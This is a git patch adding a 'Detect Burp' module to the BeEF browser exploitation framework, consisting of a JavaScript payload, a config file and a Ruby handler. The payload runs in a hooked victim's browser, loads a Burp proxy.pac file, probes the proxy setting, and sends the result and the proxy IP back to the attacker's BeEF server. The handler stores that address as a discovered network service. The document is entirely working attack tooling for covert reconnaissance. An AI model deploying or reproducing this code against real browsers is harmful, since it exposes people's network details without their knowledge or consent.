From 5f5181f51bc12aa8218545d585723b4170d75989 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Thu, 1 Oct 2015 07:57:27 +0000 Subject: [PATCH] Add Detect Burp module --- modules/network/detect_burp/command.js | 33 +++++++++++++++++++++++++ modules/network/detect_burp/config.yaml | 15 +++++++++++ modules/network/detect_burp/module.rb | 26 +++++++++++++++++++ 3 files changed, 74 insertions(+) create mode 100644 modules/network/detect_burp/command.js create mode 100644 modules/network/detect_burp/config.yaml create mode 100644 modules/network/detect_burp/module.rb diff --git a/modules/network/detect_burp/command.js b/modules/network/detect_burp/command.js new file mode 100644 index 000000000..9810942de --- /dev/null +++ b/modules/network/detect_burp/command.js @@ -0,0 +1,33 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + load_script = function(url) { + var s = document.createElement("script"); + s.type = 'text/javascript'; + s.src = url; + document.body.appendChild(s); + } + + get_proxy = function() { + try { + var response = FindProxyForURL('', ''); + beef.debug("Response: " + response); + beef.net.send("<%= @command_url %>", <%= @command_id %>, + "has_burp=true&response=" + response + ); + } catch(e) { + beef.debug("Response: " + e.message); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_burp=false"); + } + } + + load_script("http://burp/proxy.pac"); + setTimeout("get_proxy()", 10000); + +}); + diff --git a/modules/network/detect_burp/config.yaml b/modules/network/detect_burp/config.yaml new file mode 100644 index 000000000..e13fc8c7b --- /dev/null +++ b/modules/network/detect_burp/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_burp: + enable: true + category: "Network" + name: "Detect Burp" + description: "This module checks if the browser is using Burp. The Burp web interface must be enabled (default). The proxy IP address is returned to BeEF." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/network/detect_burp/module.rb b/modules/network/detect_burp/module.rb new file mode 100644 index 000000000..4c4bca591 --- /dev/null +++ b/modules/network/detect_burp/module.rb @@ -0,0 +1,26 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_burp < BeEF::Core::Command + + def post_execute + save({'result' => @datastore['result']}) + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + if @datastore['results'] =~ /^has_burp=true&response=PROXY ([\d\.]+:[\d]+)/ + ip = $1.split(':')[0] + port = $1.split(':')[1] + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'Burp Proxy') + end + end + end + end + +end +